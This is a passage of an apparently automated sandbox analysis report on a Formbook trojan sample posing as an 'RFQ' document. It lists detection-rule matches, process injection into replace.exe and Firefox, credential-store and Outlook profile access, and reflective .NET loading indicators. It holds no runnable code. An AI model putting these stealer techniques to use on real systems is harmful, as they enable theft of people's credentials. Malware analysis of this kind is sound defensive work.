            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031A52A05_2_031A52A0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_032412ED5_2_032412ED
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031BB2C05_2_031BB2C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031BD2F05_2_031BD2F0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0326B16B5_2_0326B16B
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0318F1725_2_0318F172
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D516C5_2_031D516C
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031AB1B05_2_031AB1B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0325F0E05_2_0325F0E0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_032570E95_2_032570E9
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031A70C05_2_031A70C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0324F0CC5_2_0324F0CC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0325F7B05_2_0325F7B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031E56305_2_031E5630
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_032516CC5_2_032516CC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_032575715_2_03257571
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0323D5B05_2_0323D5B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_032695C35_2_032695C3
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0325F43F5_2_0325F43F
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031914605_2_03191460
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0325FB765_2_0325FB76
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031BFB805_2_031BFB80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03215BF05_2_03215BF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031DDBF95_2_031DDBF9
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03213A6C5_2_03213A6C
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03257A465_2_03257A46
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0325FA495_2_0325FA49
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03241AA35_2_03241AA3
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0323DAAC5_2_0323DAAC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031E5AA05_2_031E5AA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0324DAC65_2_0324DAC6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_032359105_2_03235910
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031A99505_2_031A9950
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031BB9505_2_031BB950
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0320D8005_2_0320D800
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031A38E05_2_031A38E0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0325FF095_2_0325FF09
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031A1F925_2_031A1F92
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0325FFB15_2_0325FFB1
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031A9EB05_2_031A9EB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03257D735_2_03257D73
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031A3D405_2_031A3D40
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03251D5A5_2_03251D5A
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031BFDC05_2_031BFDC0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03219C325_2_03219C32
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0325FCF25_2_0325FCF2
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 0320EA12 appears 86 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 031E7E54 appears 107 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 0318B970 appears 262 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 031D5130 appears 58 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 0321F290 appears 103 times
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: String function: 0143EA12 appears 86 times
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: String function: 01405130 appears 36 times
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: String function: 0144F290 appears 103 times
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: String function: 013BB970 appears 254 times
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: String function: 01417E54 appears 94 times
            Source: RFQ 0400-ENPI-RQMA.exeStatic PE information: invalid certificate
            Source: RFQ 0400-ENPI-RQMA.exeStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1657413936.00000000016DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ 0400-ENPI-RQMA.exe
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1657993465.00000000032C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs RFQ 0400-ENPI-RQMA.exe
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1663447736.0000000007AE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs RFQ 0400-ENPI-RQMA.exe
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1657755988.00000000031D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs RFQ 0400-ENPI-RQMA.exe
            Source: RFQ 0400-ENPI-RQMA.exe, 00000002.00000002.1926765955.0000000000E47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameREPLACE.EXEj% vs RFQ 0400-ENPI-RQMA.exe
            Source: RFQ 0400-ENPI-RQMA.exe, 00000002.00000002.1926765955.0000000000E5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameREPLACE.EXEj% vs RFQ 0400-ENPI-RQMA.exe
            Source: RFQ 0400-ENPI-RQMA.exe, 00000002.00000002.1927402660.00000000014BD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ 0400-ENPI-RQMA.exe
            Source: RFQ 0400-ENPI-RQMA.exeBinary or memory string: OriginalFilenameaYJw.exe& vs RFQ 0400-ENPI-RQMA.exe
            Source: RFQ 0400-ENPI-RQMA.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1927201157.0000000001300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2175893456.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2175933717.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2913084591.0000000004B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1928973003.00000000017E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2896021580.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: RFQ 0400-ENPI-RQMA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, F6hFYiiBiVNM4n0oqc.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, F6hFYiiBiVNM4n0oqc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, F6hFYiiBiVNM4n0oqc.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, rDIp5G8onoljg2aKqn.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, rDIp5G8onoljg2aKqn.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, rDIp5G8onoljg2aKqn.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, F6hFYiiBiVNM4n0oqc.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, F6hFYiiBiVNM4n0oqc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, F6hFYiiBiVNM4n0oqc.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, F6hFYiiBiVNM4n0oqc.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, F6hFYiiBiVNM4n0oqc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, F6hFYiiBiVNM4n0oqc.csSecurity API names: _0020.AddAccessRule
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@1/1
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ 0400-ENPI-RQMA.exe.logJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\replace.exeFile created: C:\Users\user\AppData\Local\Temp\C3vB7APKJump to behavior
            Source: RFQ 0400-ENPI-RQMA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: RFQ 0400-ENPI-RQMA.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: replace.exe, 00000005.00000003.2110529013.0000000002B98000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2175137923.0000000002B98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: RFQ 0400-ENPI-RQMA.exeReversingLabs: Detection: 28%
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeFile read: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe:Zone.IdentifierJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe "C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe"
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess created: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe "C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe"
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
            Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess created: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe "C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe"Jump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: RFQ 0400-ENPI-RQMA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: RFQ 0400-ENPI-RQMA.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: RFQ 0400-ENPI-RQMA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: aYJw.pdb source: RFQ 0400-ENPI-RQMA.exe
            Source: Binary string: replace.pdb source: RFQ 0400-ENPI-RQMA.exe, 00000002.00000002.1926765955.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000002.2895608255.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000003.1866058996.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: replace.pdbGCTL source: RFQ 0400-ENPI-RQMA.exe, 00000002.00000002.1926765955.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000002.2895608255.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000003.1866058996.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KdcHSkcpIgYD.exe, 00000004.00000000.1853172112.00000000009BE000.00000002.00000001.01000000.0000000D.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2897838287.00000000009BE000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: RFQ 0400-ENPI-RQMA.exe, 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1928920536.0000000002FB6000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1926857156.0000000002E0E000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RFQ 0400-ENPI-RQMA.exe, RFQ 0400-ENPI-RQMA.exe, 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000005.00000003.1928920536.0000000002FB6000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1926857156.0000000002E0E000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: aYJw.pdbSHA256 source: RFQ 0400-ENPI-RQMA.exe

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: RFQ 0400-ENPI-RQMA.exe, Form1.cs.Net Code: InitializeComponent
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, F6hFYiiBiVNM4n0oqc.cs.Net Code: UR0T1nKqk3 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, F6hFYiiBiVNM4n0oqc.cs.Net Code: UR0T1nKqk3 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.32e5318.4.raw.unpack, HomeView.cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, F6hFYiiBiVNM4n0oqc.cs.Net Code: UR0T1nKqk3 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.7ae0000.11.raw.unpack, HomeView.cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: RFQ 0400-ENPI-RQMA.exeStatic PE information: 0xECE1BD42 [Thu Dec 8 21:10:26 2095 UTC]
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_016AE460 pushfd ; retf 0_2_016AE461
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B24507 pushad ; retf 0_2_07B24508
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B244FD pushad ; retf 0_2_07B244FE
